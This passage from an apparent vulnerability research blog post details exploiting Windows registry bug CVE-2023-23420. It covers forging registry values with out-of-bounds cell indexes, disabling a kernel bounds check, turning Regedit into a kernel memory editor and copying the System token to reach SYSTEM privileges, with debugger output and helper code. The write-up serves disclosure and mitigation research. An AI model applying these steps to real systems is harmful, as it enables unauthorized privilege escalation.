(&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive) (&((nt!_CM_RM*)0xffff82828fdcc8e0)->CmHive)                 : 0xffff82828fdcc930 [Type: _CMHIVE * *]     0xffff82828fc1a000 [Type: _CMHIVE *] So, the calculation is (0xffff82828fdcc930 - 0xffff82828fdcc8e0) ÷ 0x18 = 3. Next, we can verify where the CmHive pointer falls within the _HMAP_ENTRY structure. 0: kd> dt _HMAP_ENTRY 0xffff82828fdcc8e0+3*0x18 nt!_HMAP_ENTRY    +0x000 BlockOffset      : 0    +0x008 PermanentBinAddress : 0xffff8282`8fc1a000    +0x010 MemAlloc         : 0 The _CM_RM.CmHive pointer aligns with the PermanentBinAddress field, which is good news. Additionally, the BlockOffset field is zero, which is also desirable. Internally, it corresponds to the ContainerSize field, which is zero'ed out if no KTM transactions have been performed on the hive during this session – this will suffice for our example. We have now calculated three of the four cell index elements, and the last one is the offset, which we will set to zero, as we want to access the _CMHIVE structure from the very beginning. It is time to gather all this information in one place; we can build the final cell index using a simple Python function: >>> def MakeCellIndex(storage, directory, table, offset): ...     print("0x%x" % ((storage << 31) | (directory << 21) | (table << 12) | offset)) ... And then pass the values we have established so far: >>> MakeCellIndex(1, 0x193, 3, 0) 0xb2603000 >>> So the final out-of-bounds cell index pointing to the _CMHIVE structure of a given hive is 0xB2603000. It is now time to verify in WinDbg whether this magic index actually works as intended. 0: kd> !reg cellindex ffff82828fc1a000 b2603000 Map = ffff82828fc1a3a0 Type = 1 Table = 193 Block = 3 Offset = 0 MapTable     = ffff82828fdcc8e0  MapEntry     = ffff82828fdcc928  BinAddress = ffff82828fc1a000, BlockOffset = 0000000000000000 BlockAddress = ffff82828fc1a000  pcell:  ffff82828fc1a004 Indeed, the _CMHIVE address passed as the input of the command was also printed in its output, which means that our technique works (the extra 0x4 in the output address is there to account for the cell size). If we were to insert this index into the _CM_KEY_VALUE.Data field, we would gain the ability to read from and write to the _CMHIVE structure in kernel memory through the registry value. This represents a very powerful capability in the hands of a local attacker.Writing the exploit At this stage, we already have a solid plan for how to leverage the initial primitive of hive memory corruption for further privilege escalation. It's time to choose a specific vulnerability and begin writing an actual exploit for it. This process is described in detail below.Step 0: Choosing the vulnerability Faced with approximately 17 vulnerabilities related to hive memory corruption, the immediate challenge is selecting one for a demonstration exploit. While any of these bugs could eventually be exploited with time and experimentation, they vary in difficulty. There is also an aesthetic consideration: for demonstration purposes, it would be ideal if the exploit's actions were visible within Regedit, which narrows our options. Nevertheless, with a significant selection still available, we should be able to identify a suitable candidate. Let's briefly examine two distinct possibilities.CVE-2022-34707 The first vulnerability that always comes to my mind in the context of the registry is CVE-2022-34707. This is partly because it was the first bug I manually discovered as part of this research, but mainly because it is incredibly convenient to exploit. The essence of this bug is that it was possible to load a hive with a security descriptor containing a refcount very close to the maximum 32-bit value (e.g., 0xFFFFFFFF), and then overflow it by creating a few more keys that used it. This resulted in a very powerful UAF primitive, as the incorrectly freed cell could be subsequently filled with new objects and then freed again any number of times. In this way, it was possible to achieve type confusion of several different types of objects, e.g., by reusing the same cell subsequently as a security descriptor → value node → value data backing cell, we could easily gain control over the _CM_KEY_VALUE structure, allowing us to continue the attack using out-of-bounds cell indexes. Due to its characteristics, this bug was also the first vulnerability in this research for which I wrote a full-fledged exploit. Many of the techniques I describe here were discovered while working on this bug. Furthermore, the screenshot showing the privilege escalation at the end of blog post #1 illustrates the successful exploitation of CVE-2022-34707. However, in the context of this blog post, it has one fundamental flaw: to set the initial refcount to a value close to overflowing the 32-bit range, it is necessary to manually craft the input regf file. This means that the target can only be an app hive, and thus we wouldn't be able to directly observe the exploitation in the Registry Editor. This would greatly reduce my ability to visually demonstrate the exploit, which is what ultimately led me to look for a better bug.CVE-2023-23420 This brings us to the second vulnerability, CVE-2023-23420. This is also a UAF condition within the hive, but it concerns a key node cell instead of a security descriptor cell. It was caused by certain issues in the transactional key rename operation. These problems were so deep and affected such fundamental aspects of the registry that this and the related vulnerabilities CVE-2023-23421, CVE-2023-23422 and CVE-2023-23423 were fixed by completely removing support for transacted key rename operations. In terms of exploitation, this bug is particularly unique because it can be triggered using only API/system calls, making it possible to corrupt any hive the attacker has write access to. This makes it an ideal candidate for writing an exploit whose operation is visible to the naked eye using standard Windows registry utilities, so that's what we'll do. Although the details of massaging the hive layout into the desired state may be slightly more difficult here than with CVE-2022-34707, it's nothing we can't handle. So let's get to work!Step 1: Abusing the UAF to establish dynamically-controlled value cells Let's start by clarifying that our attack will target the HKCU hive, and more specifically its volatile storage space. This will hopefully make the exploit a bit more reliable, as the volatile space resets each time the hive is reloaded, and there generally isn't much activity occurring there. The exploitation process begins with a key node use-after-free, and our goal is to take full control over the _CM_KEY_VALUE representation of two registry values by the end of the first stage (why two – we'll get to that in a moment). Once we achieve this goal, we will be able to arbitrarily set the _CM_KEY_VALUE.Data field, and thus gain read/write access to any chosen out-of-bounds cell index. There are many different approaches to how to achieve this, but in my proof-of-concept, I started with the following data layout: At the top of the hierarchy is the HKCU\Exploit key, which is the root of the entire exploit subtree. Its only role is to work as a container for all the other keys and values we create. Below it, we have the "TmpKeyName" key, which is important for two reasons: first, it stores four values that will be used at a later stage to fill freed cells with controlled data (but are currently empty). Second, this is the key on which we will perform the "rename" operation, which is the basis of the CVE-2023-23420 vulnerability. Below it are two more keys, "SubKey1" and "SubKey2", which are also needed in the exploitation process for transactional deletion, each through a different view of their parent. Once we have this data layout arranged in the hive, we can proceed to trigger the memory corruption. We can do it exactly as described in the original report in section "Operating on subkeys of transactionally renamed keys", and demonstrated in the corresponding InconsistentSubkeyList.cpp source code. In short, it involves the following steps: Creating a lightweight transaction by calling the NtCreateRegistryTransaction syscall.Opening two different handles to the HKCU\Exploit\TmpKeyName key within our newly created transaction.Performing a transactional rename operation on one of these handles, changing the name to "Scratchpad".Transactionally deleting the "SubKey1" and "SubKey2" keys, each through a different parent handle (one renamed, the other not).Committing the entire transaction by calling the NtCommitRegistryTransaction syscall. After successfully executing these operations on a vulnerable system, the layout of our objects within the hive should change accordingly: We see that the "TmpKeyName" key has been renamed to "Scratchpad", and both its subkeys have been released, but the freed cell of the second subkey still appears on its parent's subkey list. At this point, we want to use the four values of the "Scratchpad" key to create our own fake data structure. According to it, the freed subkey will still appear as existing, and contain two values named "KernelAddr" and "KernelData". Each of the "Container" values is responsible for imitating one type of object, and the most crucial role is played by the "FakeKeyContainer" value. Its backing buffer must perfectly align with the memory previously associated with the "SubKey1" key node. The diagram below illustrates the desired outcome: All the highlighted cells contain attacker-controlled data, which represent valid regf structures describing the HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps: Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us. If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity. Step 2: Getting read/write access to the CMHIVE kernel object Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise: This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information: Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. nt!DbgBreakPointWithStatus: fffff800`8061ff20 cc              int     3 0: kd> !analyze -v ******************************************************************************* *                                                                             * *                        Bugcheck Analysis                                    * *                                                                             * ******************************************************************************* REGISTRY_ERROR (51) Something has gone badly wrong with the registry.  If a kernel debugger is available, get a stack trace. It can also indicate that the registry got an I/O error while trying to read one of its files, so it can be caused by hardware problems or filesystem corruption. It may occur due to a failure in a refresh operation, which is used only in by the security system, and then only when resource limits are encountered. Arguments: Arg1: 0000000000000001, (reserved) Arg2: ffffd4855dc36000, (reserved) Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of         HvCheckHive if the hive is corrupt. [...] 0: kd> k  # Child-SP          RetAddr               Call Site 00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus 01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12 02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71 03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107 04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5 05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5 06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e 07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e 08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25 09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114 We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series. To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:   _HV_GET_CELL_CONTEXT Context;   //   // Translate the cell index to virtual address   //   PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);   //   // Operate on the cell view using the CellAddress pointer   //   ...   //   // Release the cell   //   Hive->ReleaseCellRoutine(Hive, &Context) There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls. The presence or absence of the "release" function in consecutive Windows versions is shown below:Windows NT 3.1 – 2000: ❌Windows XP – 7: ✅Windows 8 – 8.1: ❌Windows 10 – 11: ✅ Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x: VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX RealCell;   _HMAP_ENTRY *MapEntry;   RealCell = Context->Cell & 0xFFFFFFFE;   MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);   if (MapEntry == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);   }   if ((Context->Cell & 1) != 0) {     HvpMapEntryReleaseBinAddress(MapEntry);   }   HvpGetCellContextReinitialize(Context); } _HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {   DWORD StorageType = CellIndex >> 31;   DWORD StorageIndex = CellIndex & 0x7FFFFFFF;   if (StorageIndex < Hive->Storage[StorageType].Length) {     return &Hive->Storage[StorageType].Map                                      ->Directory[(CellIndex >> 21) & 0x3FF]                                      ->Table[(CellIndex >> 12) & 0x1FF];   } else {     return NULL;   } } VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {   ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown); } VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {   Context->Cell = -1;   Context->Hive = NULL; } As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered. This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form: VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX Cell = Context->Cell;   DWORD StorageIndex = Cell & 0x7FFFFFFF;   DWORD StorageType = Cell >> 31;   if (StorageIndex >= Hive->Storage[StorageType].Length ||       &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);   }   Context->Cell = -1;   Context->BinContext = 0; } The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead? As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way: if (StorageIndex >= Hive->Storage[StorageType].Length || /* ... */) {   KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267); } The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage: 0: kd> dx (&((_HHIVE*)0)->Storage[0].Length) (&((_HHIVE*)0)->Storage[0].Length)                 : 0x118 0: kd> dx (&((_HHIVE*)0)->Storage[1].Length) (&((_HHIVE*)0)->Storage[1].Length)                 : 0x390 As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above, we can obtain an index that points directly to the Length field. Let's test this in practice: 0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)  (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)                  : 0xffff810713f82390 0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4 Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c MapTable     = ffff810713debe90  MapEntry     = ffff810713debed8  BinAddress = ffff810713f82000, BlockOffset = 0000000000000000 BlockAddress = ffff810713f82000  pcell:  ffff810713f82390 So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps: Crafting a controlled registry value with a data index of 0xB260338C.Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability. To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place. The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future. For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path. Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor: It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory: 0: kd> dt _HHIVE ffff810713f82000 nt!_HHIVE    +0x000 Signature        : 0xbee0bee0    +0x008 GetCellRoutine   : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0    +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0    +0x018 Allocate         : 0xfffff801`804cae30     void*  nt!CmpAllocate+0    +0x020 Free             : 0xfffff801`804c9100     void  nt!CmpFree+0    +0x028 FileWrite        : 0xfffff801`80595e00     long  nt!CmpFileWrite+0    +0x030 FileRead         : 0xfffff801`805336a0     long  nt!CmpFileRead+0    +0x038 HiveLoadFailure  : (null)    +0x040 BaseBlock        : 0xffff8107`13f9a000 _HBASE_BLOCK [...] Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!Step 3: Getting arbitrary read/write access to the entire kernel address space At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be. If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often. 🙂 The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr. In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences: _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU)._CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives. For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list. The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields: _CMHIVE layout _HMAP_ENTRY layout +0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT +0x000 BlockOffset         : Uint8B +0xb78 RootKcb          : Ptr64 _CM_KEY_CONTROL_BLOCK +0x008 PermanentBinAddress : Uint8B +0xb80 Frozen           : UChar +0x010 MemAlloc            : Uint4B On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number. As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose: >>> MakeCellIndex(1, 0x7F, 0x29, 0) 0x8fe29000 So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below: The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved. We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement: return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration. So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations: The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything. However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg: 0: kd> ? nt Evaluate expression: -8781857554432 = fffff803`50800000 0: kd> db /c8 fffff803`50800004 fffff803`50800004  03 00 00 00 04 00 00 00  ........ fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........ fffff803`50800014  00 00 00 00 40 00 00 00  ....@... fffff803`5080001c  00 00 00 00 00 00 00 00  ........ fffff803`50800024  00 00 00 00 00 00 00 00  ........ fffff803`5080002c  00 00 00 00 00 00 00 00  ........ fffff803`50800034  00 00 00 00 00 00 00 00  ........ fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........ fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be And then let's browse to the same address using our FakeKey in Regedit: The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC. An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂Step 4: Elevating process security token With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below. This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows: C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg [+] Found kernel base address: fffff80350800000 [+] Spawning a command prompt... [+] Found PID 6892 at address ffff8107b3864080 [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943 [+] Exploit succeeded, enjoy! C:\Users\user\Desktop\exploits> Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges: As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation: Final thoughts Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken: To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.Exploit mitigations The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical. Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.False File Immutability So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are 